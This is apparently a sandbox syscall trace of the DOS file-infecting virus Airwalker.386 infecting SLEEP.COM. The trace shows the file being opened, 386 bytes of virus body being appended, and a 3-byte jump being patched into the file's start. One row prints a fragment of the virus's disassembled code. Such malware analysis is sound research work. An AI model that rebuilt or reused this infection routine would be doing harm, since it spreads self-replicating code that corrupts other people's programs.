Time | Syscall Op | PC | Syscall Name |
---|---|---|---|
2018-12-17T22:19:44.534144889Z | 26 | PC: 12ab3 | Set disk transfer address |
2018-12-17T22:19:44.536643995Z | 78 | PC: 12abf | Find first file |
2018-12-17T22:19:44.542545276Z | 61 | PC: 12afe | Open file (Filename = 'SLEEP.COM') |
2018-12-17T22:19:44.548840752Z | 63 | PC: 12b0c | Read file or device (Read 3 bytes on handle 5) |
2018-12-17T22:19:44.555234879Z | 66 | PC: 12b1f | Move file pointer |
2018-12-17T22:19:44.55680089Z | 44 | PC: 12b2c | Get time 0x12b2c: xchg cl, ch 0x12b2e: add dx, cx 0x12b30: mov word ptr [bp + 0x172], dx 0x12b34: xor word ptr [bp + 0x15d], 0x1717 0x12b3a: xor byte ptr [bp + 0x15f], 0x19 0x12b3f: mov ah, 0x40 0x12b41: mov cx, 0x182 0x12b44: lea dx, word ptr [bp] 0x12b47: pushaw 0x12b48: jmp 0x12bfa 0x12b4b: pop ax 0x12b4c: jb 0x12b77 0x12b4e: sub ax, 3 0x12b51: push bx 0x12b52: mov bx, bp 0x12b54: mov word ptr cs:[bx + 1], ax 0x12b58: mov byte ptr [bx], 0xe9 0x12b5b: pop bx 0x12b5c: mov ax, 0x4200 0x12b5f: xor cx, cx |
2018-12-17T22:19:44.55912979Z | 64 | PC: 12c00 | Write file or device (Write 386 bytes on handle 5) |
2018-12-17T22:19:44.572531408Z | 66 | PC: 12b64 | Move file pointer |
2018-12-17T22:19:44.573835903Z | 64 | PC: 12b71 | Write file or device (Write 3 bytes on handle 5) |
2018-12-17T22:19:44.580040616Z | 62 | PC: 12b77 | Close file |
2018-12-17T22:19:44.5878074Z | 9 | PC: 12a47 | Display string (String= 'WARNING: You have just released the Airwalker.386 virus! ') |